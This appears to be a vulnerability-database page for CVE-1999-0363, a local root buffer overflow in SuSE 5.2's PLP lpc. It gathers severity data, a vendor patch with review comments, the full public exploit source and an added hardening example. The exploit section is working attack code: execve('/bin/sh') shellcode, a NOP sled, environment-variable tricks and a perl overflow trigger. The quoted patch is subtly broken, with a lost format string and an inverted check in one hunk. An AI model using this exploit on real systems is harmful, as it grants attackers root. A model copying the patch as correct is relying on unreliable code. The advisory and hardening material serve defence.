CVE-1999-0363
CVSS 7.2
Published: 1999-02-02 00:00:00
Last revised: 2008-09-09 08:34:25

[Original] SuSE 5.2 PLP lpc program has a buffer overflow that leads to root compromise.


[CNNVD] S.u.S.E. 5.2 lpc vulnerability (CNNVD-199902-008)

        The PLP lpc program in SuSE 5.2 contains a buffer overflow that leads to root compromise.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [the system can be rendered completely unavailable]
Access complexity: LOW [no special access conditions are needed to exploit]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is required to exploit]

- CPE (affected platforms and products)

cpe:/a:plp:line_printer_control
cpe:/o:suse:suse_linux:5.2 (SuSE Linux 5.2)

- OVAL (technical details for detection)

No matching OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0363
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0363
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199902-008
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/328
(UNKNOWN)  BID 328

- Vulnerability information

S.u.S.E. 5.2 lpc vulnerability
High severity  Buffer overflow
Published: 1999-02-02 00:00:00  Updated: 2005-05-02 00:00:00
Local
        The PLP lpc program in SuSE 5.2 contains a buffer overflow that leads to root compromise.

- Advisory and patch

        There is an alternative lpc suite that can be used, or the patch below.
        lpr, the alternative to lpc, is included in the S.u.S.E. 5.2 source library in the form of lpr-tlr-971016.tar.gz (or newer).
        If you wish to continue using the vulnerable version of lpc, apply the following patch:
        --- /usr/src/packages/SOURCES/origplp/plp-4.0.3/src/common/control_ops.c Thu Jun 15 14:09:12 1995
        +++ /usr/src/packages/SOURCES/newplp/plp-4.0.3/src/common/control_ops.c Wed Feb
        3 12:36:17 1999
        @@ -676,7 +676,7 @@
        att_mark = False;
        if ((afp = fopen_daemon (Attach_file, "r"))) { /* Try to open attach file */
        - if (fscanf (afp, "", afname) == 1) {
        + if (fgets (afname, sizeof(afname), afp) != NULL) {
        if (strsame (afname, Printer)) {
        fatal (XLOG_INFO, "Printer '' attached to itself", Printer);
        }
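Review bot: the replacement line `if (fgets (afname, sizeof(afname), afp) != NULL) {` leaves the trailing newline that fgets reads into afname, so the `strsame (afname, Printer)` that follows compares "lp\n" with "lp" and the self-attach check never fires on a normally written attach file; strip it (e.g. `afname[strcspn(afname, "\n")] = '\0';`) before the compare, and treat a full buffer with no newline as a corrupted attach file rather than silently truncating the name. Two smaller points: `sizeof(afname)` is a real bound only if afname is an array in this scope and not a pointer, and the removed line shows an empty fscanf format (`""`), which can never return 1, so the width-less `%s` that caused the overflow appears to have been lost from the listing.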
        @@ -1622,7 +1622,7 @@
        if ((s = C_abort ())) {
        if (stat (Attach_file, &statb) == 0) {
        if ((afp = fopen_daemon (Attach_file, "r"))) {
        - if (fscanf (afp, "", afname) != 1) {
        + if (fgets (afname, sizeof(afname), afp) != NULL) {
        fatal (XLOG_INFO, "attach file for printer corrupted!",
        Printer);
        }
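Review bot: the condition in this hunk is inverted. The removed `if (fscanf (afp, "", afname) != 1) {` calls fatal() when the read fails, but the added `if (fgets (afname, sizeof(afname), afp) != NULL) {` calls fatal("attach file for printer corrupted!") when the read succeeds and falls through with afname unset when it fails; it should read `if (fgets (afname, sizeof(afname), afp) == NULL) {`. The trailing-newline concern from the first control_ops.c hunk applies here as well.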
        --- /usr/src/packages/SOURCES/origplp/plp-4.0.3/src/common/displayq.c Tue Aug
        29 12:44:35 1995
        +++ /usr/src/packages/SOURCES/newplp/plp-4.0.3/src/common/displayq.c Wed Feb
        3 12:35:37 1999
        @@ -99,7 +99,7 @@
        * check to see if attached to another printerq, alter printer if attached
        */
        if (Attach_file && *Attach_file && ((afp = fopen (Attach_file, "r")))) {
        - if (fscanf (afp, "", afname) == 1) {
        + if (fgets (afname, sizeof(afname), afp) != NULL) {
        if (strsame (afname, Printer)) {
        fatal (XLOG_INFO, "Printer '' attached to itself", Printer);
        }
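Review bot: same trailing-newline problem as in control_ops.c: once fgets leaves the "\n" in afname, `strsame (afname, Printer)` cannot match, so `lpc status` follows an attachment to "lp\n" and the self-attach fatal() is unreachable; strip the newline before the compare. Also, this site opens the attach file with plain `fopen` while both control_ops.c sites use `fopen_daemon`; that difference is pre-existing, but it is worth aligning while all three readers are being touched.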

- Vulnerability information (19259)

S.u.S.E. 5.2 lpc Vulnerability (EDBID:19259)
linux local
1999-02-03 Verified
Author: xnec
source: http://www.securityfocus.com/bid/328/info


The PLP Line Printer Control program shipped with S.u.S.E. 5.2 is vulnerable to a local buffer overflow. You can determine whether you are vulnerable by typing 'lpc': if you are presented with an lpc version number, you are vulnerable. The consequence of lpc exploitation is root access for a local user.

/*

Standard overflow for x86 linux lpc. PLP Line Printer Control program, version 4.0.3.
Tested on SuSE 5.2 (suidroot). Test your copy of /usr/bin/lpc by trying:

    /usr/bin/lpc attach lp `perl -e "print 'A' x 1000"`; lpc status lp

The problematic code is in displayq.c and control_ops.c, where we attempt to
fscanf() the lockfile's contents into a fixed length buffer. See the Bugtraq
post for full fix information (www.geek-girl.com/bugtraq).

The buffer we're overflowing is 256 bytes, and an offset of 0 works just fine.
Try in increments of +-100 if it doesn't work for you.

Obviously this is a complete rip of Aleph1's standard overflow program from his
paper "Smashing the Stack for Fun and Profit".

to compile: gcc -o xnec_lpc xnec_lpc.c

bugs: only sets uid=0, and you may have to have a printer defined (lp on my box).

greets to #sk1llz

-xnec  xnec on EF and DALnet, xnec@inferno.tusculum.edu

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEFAULT_OFFSET      0
#define DEFAULT_BUFFER_SIZE 356
#define DEFAULT_EGG_SIZE    2048
#define NOP                 0x90

char pause_ch;   /* the original named this 'pause', which shadows pause(2) */

/* Aleph1's Linux/x86 execve("/bin/sh") shellcode */
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Returns the current stack pointer (32-bit x86 only: the value is left in %eax) */
unsigned long get_esp(void)
{
    __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[])
{
    char *buff, *ptr, *egg;
    long *addr_ptr, addr;
    int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
    int i, eggsize = DEFAULT_EGG_SIZE;

    if (argc > 1) bsize   = atoi(argv[1]);
    if (argc > 2) offset  = atoi(argv[2]);
    if (argc > 3) eggsize = atoi(argv[3]);

    if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }
    if (!(egg = malloc(eggsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }

    /* Guess a return address near our own stack pointer; lpc's stack will be close by */
    addr = get_esp() - offset;
    printf("Using address: 0x%lx\n", addr);

    printf("\nPLP Line Printer Control program, version 4.0.3 overflow.\n");
    printf("Bug found by xnec, code ripped from Aleph1. After running this program, "
           "simply compile and run:\n---\n"
           "#include <unistd.h>\n"
           "void main(){system(\"/bin/bash\");}\n---\n");
    scanf("%c", &pause_ch);   /* the original passed 'pause' by value; it must be an address */

    /* RET: fill the printer-name argument with copies of the guessed return address */
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i += 4)
        *(addr_ptr++) = addr;

    /* EGG: NOP sled followed by the shellcode, handed to lpc through its environment */
    ptr = egg;
    for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
        *(ptr++) = NOP;
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

    buff[bsize - 1] = '\0';
    egg[eggsize - 1] = '\0';

    memcpy(egg, "EGG=", 4);
    putenv(egg);
    memcpy(buff, "RET=", 4);
    putenv(buff);

    /* 'attach' writes $RET into the attach file; 'status' reads it back with the unbounded fscanf */
    system("`which lpc` attach lp $RET; `which lpc` status lp");
    return 0;
}
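The root cause named in the advisory and in the exploit header is a width-less fscanf("%s") that copies the attach file's contents into a fixed 256-byte afname buffer; the vendor patch swaps in fgets. What follows is an added example, not code from PLP, SuSE or the exploit author. It shows the unbounded read beside a bounded reader that also rejects an over-long or empty name and strips the newline fgets leaves behind (which the fgets in the vendor patch does not), plus a write-side check for the name that `lpc attach` stores. The 256-byte size is the one the exploit header states; the names ATTACH_NAME_MAX, read_attach_bounded, attach_resolves_to, overlong_attach_rejected and printer_name_ok, the attach-file bodies, and the character policy in printer_name_ok are all assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define ATTACH_NAME_MAX 256   /* size of the fixed afname buffer quoted in the exploit header */

/* Vulnerable pattern (the shape of the fscanf in control_ops.c / displayq.c):
 * a width-less %s writes the whole token into afname, so a name longer than
 * 255 bytes in the attach file runs past the buffer. Shown for contrast only. */
int read_attach_unbounded(FILE *afp, char afname[ATTACH_NAME_MAX])
{
    return fscanf(afp, "%s", afname) == 1;
}

/* Hardened reader: bounded read, newline stripped, truncated or empty names
 * rejected instead of being passed on to the printer lookup. Names of 255
 * bytes or more are rejected because they cannot fit with a terminator. */
int read_attach_bounded(FILE *afp, char afname[ATTACH_NAME_MAX])
{
    if (fgets(afname, ATTACH_NAME_MAX, afp) == NULL)
        return 0;                              /* empty or unreadable attach file */
    size_t n = strcspn(afname, "\r\n");
    if (afname[n] == '\0' && n == ATTACH_NAME_MAX - 1)
        return 0;                              /* buffer full and no newline: line was longer than afname */
    afname[n] = '\0';                          /* drop the newline fgets keeps */
    return n > 0;
}

/* Write-side check for the argument of 'lpc attach' before it reaches the
 * attach file: printcap-style characters only, and short enough for afname.
 * This policy is an assumption for the example, not PLP's own rule. */
int printer_name_ok(const char *name)
{
    size_t n = strlen(name);
    if (n == 0 || n >= ATTACH_NAME_MAX)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '_' || c == '-' || c == '.'))
            return 0;
    }
    return 1;
}

/* Runs the bounded reader over a constructed attach-file body and reports
 * whether it was accepted with exactly the expected printer name. */
int attach_resolves_to(const char *body, const char *expected)
{
    char afname[ATTACH_NAME_MAX];
    FILE *afp = tmpfile();
    if (afp == NULL)
        return 0;
    fputs(body, afp);
    rewind(afp);
    int ok = read_attach_bounded(afp, afname);
    fclose(afp);
    return ok && strcmp(afname, expected) == 0;
}

/* Models the exploit's trigger: an attach file holding `len` 'A' bytes and
 * no newline (constructed input). Returns 1 if the bounded reader rejects it. */
int overlong_attach_rejected(size_t len)
{
    char afname[ATTACH_NAME_MAX];
    FILE *afp = tmpfile();
    if (afp == NULL)
        return 0;
    for (size_t i = 0; i < len; i++)
        fputc('A', afp);
    rewind(afp);
    int ok = read_attach_bounded(afp, afname);
    fclose(afp);
    return !ok;
}

int main(void)
{
    /* Self-attach check the patched fgets misses when "lp\n" is left in afname */
    printf("attach file \"lp\\n\" names printer lp: %d\n", attach_resolves_to("lp\n", "lp"));
    /* The 1000-byte body from the exploit's perl one-liner is refused, not copied */
    printf("1000-byte attach body rejected: %d\n", overlong_attach_rejected(1000));
    /* Write-side check on the name given to 'lpc attach' */
    printf("\"lp; id\" accepted as printer name: %d\n", printer_name_ok("lp; id"));
    return 0;
}
```

The 1000-byte body is rejected whether or not `lpc attach` terminates it with a newline: either way fgets fills all 255 usable bytes without seeing one. Rejecting a full buffer rather than truncating it matters because a truncated name would still be looked up as a printer and silently mis-route the status request.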

- Vulnerability information

977
SuSE PLP lpc Local Overflow
Local Access Required  Input Manipulation
Loss of Integrity  Workaround
Exploit Public  Third-party Verified

- Vulnerability description

Unknown or Incomplete

- Timeline

1999-02-03 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete